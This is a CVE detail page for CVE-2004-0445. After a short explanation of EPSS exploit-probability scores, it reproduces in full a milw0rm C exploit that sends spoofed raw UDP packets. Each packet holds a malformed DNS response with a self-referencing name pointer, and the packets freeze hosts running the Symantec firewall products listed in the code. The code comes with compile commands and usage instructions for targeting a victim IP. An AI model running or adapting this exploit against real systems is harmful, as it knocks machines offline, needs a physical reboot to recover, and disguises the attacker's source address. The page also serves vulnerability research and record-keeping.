CVE-2004-0445 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

/* HOD-symantec-firewall-DoS-expl.c: * * Symantec Multiple Firewall DNS Response Denial-of-Service * * Exploit version 0.1 coded by * * * .::[ houseofdabus ]::. * * * * Bug discoveried by eEye: * http://www.eeye.com/html/Research/Advisories/AD20040512B.html * * ------------------------------------------------------------------- * Tested on: * - Symantec Norton Personal Firewall 2004 * * * Systems Affected: * - Symantec Norton Internet Security 2002 * - Symantec Norton Internet Security 2003 * - Symantec Norton Internet Security 2004 * - Symantec Norton Internet Security Professional 2002 * - Symantec Norton Internet Security Professional 2003 * - Symantec Norton Internet Security Professional 2004 * - Symantec Norton Personal Firewall 2002 * - Symantec Norton Personal Firewall 2003 * - Symantec Norton Personal Firewall 2004 * - Symantec Client Firewall 5.01, 5.1.1 * - Symantec Client Security 1.0, 1.1, 2.0(SCF 7.1) * - Symantec Norton AntiSpam 2004 * * ------------------------------------------------------------------- * Description: * eEye Digital Security has discovered a second vulnerability * in the Symantec firewall product line that can be remotely * exploited to cause a severe denial-of-service condition on * systems running a default installation of an affected version * of the product. By sending a single malicious DNS (UDP port 53) * response packet to a vulnerable host, an attacker can cause * the Symantec DNS response validation code to enter an infinite * loop within the kernel, amounting to a system freeze that requires * the machine to be physically rebooted in order to restore operation. * * ------------------------------------------------------------------- * Compile: * Win32/VC++ : cl -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c ws2_32.lib * Win32/cygwin: gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -lws2_32.lib * Linux : gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -Wall * * ------------------------------------------------------------------- * Command Line Parameters/Arguments: * * HOD-symantec-firewall-DoS-expl [-fi:str] [-tp:int] [-ti:str] [-n:int] * * -fi:IP From (sender) IP address * -tp:int To (recipient) port number * -ti:IP To (recipient) IP address * -n:int Number of times to send message * */ #ifdef _WIN32 #pragma comment(lib,"ws2_32") #pragma pack(1) #define WIN32_LEAN_AND_MEAN #include <winsock2.h> #include <ws2tcpip.h> /* IP_HDRINCL */ #include <stdio.h> #include <stdlib.h> #else #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #include <stdio.h> #include <stdlib.h> #include <arpa/inet.h> #include <netdb.h> #include <sys/timeb.h> #include <string.h> #endif #define MAX_MESSAGE 4068 #define MAX_PACKET 4096 #define DEFAULT_PORT 53 #define DEFAULT_IP "10.0.0.1" #define DEFAULT_COUNT 1 #ifndef _WIN32 # define FAR #endif /* Define the DNS header */ char dnsreply[] = "\xc9\x9c" /* Transaction ID */ "\x80\x00" /* Flags (bit 15: response) */ "\x00\x01" /* Number of questions */ "\x00\x01" /* Number of answer RRs */ "\x00\x00" /* Number of authority RRs */ "\x00\x00" /* Number of additional RRs */ "\xC0\x0C"; /* Compressed name pointer to itself */ /* Define the IP header */ typedef struct ip_hdr { unsigned char ip_verlen; /* IP version & length */ unsigned char ip_tos; /* IP type of service */ unsigned short ip_totallength; /* Total length */ unsigned short ip_id; /* Unique identifier */ unsigned short ip_offset; /* Fragment offset field */ unsigned char ip_ttl; /* Time to live */ unsigned char ip_protocol; /* Protocol */ unsigned short ip_checksum; /* IP checksum */ unsigned int ip_srcaddr; /* Source address */ unsigned int ip_destaddr; /* Destination address */ } IP_HDR, *PIP_HDR, FAR* LPIP_HDR; /* Define the UDP header */ typedef struct udp_hdr { unsigned short src_portno; /* Source port number */ unsigned short dst_portno; /* Destination port number */ unsigned short udp_length; /* UDP packet length */ unsigned short udp_checksum; /* UDP checksum (optional) */ } UDP_HDR, *PUDP_HDR; /* globals */ unsigned long dwToIP, // IP to send to dwFromIP; // IP to send from (spoof) unsigned short iToPort, // Port to send to iFromPort; // Port to send from (spoof) unsigned long dwCount; // Number of times to send char strMessage[MAX_MESSAGE]; // Message to send void usage(char *progname) { printf("Usage:\n\n"); printf("%s <-fi:SRC-IP> <-ti:VICTIM-IP> [-tp:DST-PORT] [-n:int]\n\n", progname); printf(" -fi:IP From (sender) IP address\n"); printf(" -tp:int To (recipient) open UDP port number:\n"); printf(" 137, 138, 445, 500(default)\n"); printf(" -ti:IP To (recipient) IP address\n"); printf(" -n:int Number of times\n"); exit(1); } void ValidateArgs(int argc, char **argv) { int i; iToPort = 500; iFromPort = DEFAULT_PORT; dwToIP = inet_addr(DEFAULT_IP); dwFromIP = inet_addr(DEFAULT_IP); dwCount = DEFAULT_COUNT; memcpy(strMessage, dnsreply, sizeof(dnsreply)-1); for(i = 1; i < argc; i++) { if ((argv[i][0] == '-') || (argv[i][0] == '/')) { switch (tolower(argv[i][1])) { case 'f': switch (tolower(argv[i][2])) { case 'i': if (strlen(argv[i]) > 4) dwFromIP = inet_addr(&argv[i][4]); break; default: usage(argv[0]); break; } break; case 't': switch (tolower(argv[i][2])) { case 'p': if (strlen(argv[i]) > 4) iToPort = atoi(&argv[i][4]); break; case 'i': if (strlen(argv[i]) > 4) dwToIP = inet_addr(&argv[i][4]); break; default: usage(argv[0]); break; } break; case 'n': if (strlen(argv[i]) > 3) dwCount = atol(&argv[i][3]); break; default: usage(argv[0]); break; } } } return; } /* This function calculates the 16-bit one's complement sum */ /* for the supplied buffer */ unsigned short checksum(unsigned short *buffer, int size) { unsigned long cksum=0; while (size > 1) { cksum += *buffer++; size -= sizeof(unsigned short); } if (size) { cksum += *(unsigned char *)buffer; } cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (unsigned short)(~cksum); } int main(int argc, char **argv) { #ifdef _WIN32 WSADATA wsd; #endif int s; #ifdef _WIN32 BOOL bOpt; #else int bOpt; #endif struct sockaddr_in remote; IP_HDR ipHdr; UDP_HDR udpHdr; int ret; unsigned long i; unsigned short iTotalSize, iUdpSize, iUdpChecksumSize, iIPVersion, iIPSize, cksum = 0; char buf[MAX_PACKET], *ptr = NULL; #ifdef _WIN32 IN_ADDR addr; #else struct sockaddr_in addr; #endif printf("\nSymantec Multiple Firewall DNS Response Denial-of-Service exploit v0.1\n"); printf("Bug discoveried by eEye:\n"); printf("http://www.eeye.com/html/Research/Advisories/AD20040512B.html\n\n"); printf("--- Coded by .::[ houseofdabus ]::. ---\n\n"); if (argc < 3) usage(argv[0]); /* Parse command line arguments and print them out */ ValidateArgs(argc, argv); #ifdef _WIN32 addr.S_un.S_addr = dwFromIP; printf("[*] From IP: <%s>, port: %d\n", inet_ntoa(addr), iFromPort); addr.S_un.S_addr = dwToIP; printf("[*] To IP: <%s>, port: %d\n", inet_ntoa(addr), iToPort); printf("[*] Count: %d\n", dwCount); #else addr.sin_addr.s_addr = dwFromIP; printf("[*] From IP: <%s>, port: %d\n", inet_ntoa(addr.sin_addr), iFromPort); addr.sin_addr.s_addr = dwToIP; printf("[*] To IP: <%s>, port: %d\n", inet_ntoa(addr.sin_addr), iToPort); printf("[*] Count: %d\n", dwCount); #endif #ifdef _WIN32 if (WSAStartup(MAKEWORD(2,2), &wsd) != 0) { printf("[-] WSAStartup() failed: %d\n", GetLastError()); return -1; } #endif /* Creating a raw socket */ s = socket(AF_INET, SOCK_RAW, IPPROTO_UDP); #ifdef _WIN32 if (s == INVALID_SOCKET) { printf("[-] WSASocket() failed: %d\n", WSAGetLastError()); return -1; } #endif /* Enable the IP header include option */ #ifdef _WIN32 bOpt = TRUE; #else bOpt = 1; #endif ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt)); #ifdef _WIN32 if (ret == SOCKET_ERROR) { printf("[-] setsockopt(IP_HDRINCL) failed: %d\n", WSAGetLastError()); return -1; } #endif /* Initalize the IP header */ iTotalSize = sizeof(ipHdr) + sizeof(udpHdr) + sizeof(dnsreply)-1; iIPVersion = 4; iIPSize = sizeof(ipHdr) / sizeof(unsigned long); ipHdr.ip_verlen = (iIPVersion << 4) | iIPSize; ipHdr.ip_tos = 0; /* IP type of service */ ipHdr.ip_totallength = htons(iTotalSize); /* Total packet len */ ipHdr.ip_id = 0; /* Unique identifier: set to 0 */ ipHdr.ip_offset = 0; /* Fragment offset field */ ipHdr.ip_ttl = 128; /* Time to live */ ipHdr.ip_protocol = 0x11; /* Protocol(UDP) */ ipHdr.ip_checksum = 0 ; /* IP checksum */ ipHdr.ip_srcaddr = dwFromIP; /* Source address */ ipHdr.ip_destaddr = dwToIP; /* Destination address */ /* Initalize the UDP header */ iUdpSize = sizeof(udpHdr) + sizeof(dnsreply)-1; udpHdr.src_portno = htons(iFromPort) ; udpHdr.dst_portno = htons(iToPort) ; udpHdr.udp_length = htons(iUdpSize) ; udpHdr.udp_checksum = 0 ; iUdpChecksumSize = 0; ptr = buf; memset(buf, 0, MAX_PACKET); memcpy(ptr, &ipHdr.ip_srcaddr, sizeof(ipHdr.ip_srcaddr)); ptr += sizeof(ipHdr.ip_srcaddr); iUdpChecksumSize += sizeof(ipHdr.ip_srcaddr); memcpy(ptr, &ipHdr.ip_destaddr, sizeof(ipHdr.ip_destaddr)); ptr += sizeof(ipHdr.ip_destaddr); iUdpChecksumSize += sizeof(ipHdr.ip_destaddr); ptr++; iUdpChecksumSize += 1; memcpy(ptr, &ipHdr.ip_protocol, sizeof(ipHdr.ip_protocol)); ptr += sizeof(ipHdr.ip_protocol); iUdpChecksumSize += sizeof(ipHdr.ip_protocol); memcpy(ptr, &udpHdr.udp_length, sizeof(udpHdr.udp_length)); ptr += sizeof(udpHdr.udp_length); iUdpChecksumSize += sizeof(udpHdr.udp_length); memcpy(ptr, &udpHdr, sizeof(udpHdr)); ptr += sizeof(udpHdr); iUdpChecksumSize += sizeof(udpHdr); for(i = 0; i < sizeof(dnsreply)-1; i++, ptr++) *ptr = strMessage[i]; iUdpChecksumSize += sizeof(dnsreply)-1; cksum = checksum((unsigned short *)buf, iUdpChecksumSize); udpHdr.udp_checksum = cksum; memset(buf, 0, MAX_PACKET); ptr = buf; memcpy(ptr, &ipHdr, sizeof(ipHdr)); ptr += sizeof(ipHdr); memcpy(ptr, &udpHdr, sizeof(udpHdr)); ptr += sizeof(udpHdr); memcpy(ptr, strMessage, sizeof(dnsreply)-1); remote.sin_family = AF_INET; remote.sin_port = htons(iToPort); remote.sin_addr.s_addr = dwToIP; for(i = 0; i < dwCount; i++) { #ifdef _WIN32 ret = sendto(s, buf, iTotalSize, 0, (SOCKADDR *)&remote, sizeof(remote)); if (ret == SOCKET_ERROR) { printf("[-] sendto() failed: %d\n", WSAGetLastError()); break; } else #else ret = sendto(s, buf, iTotalSize, 0, (struct sockaddr *) &remote, sizeof(remote)); #endif printf("[+] sent %d bytes\n", ret); } #ifdef _WIN32 closesocket(s); WSACleanup(); #endif return 0; } // milw0rm.com [2004-05-16]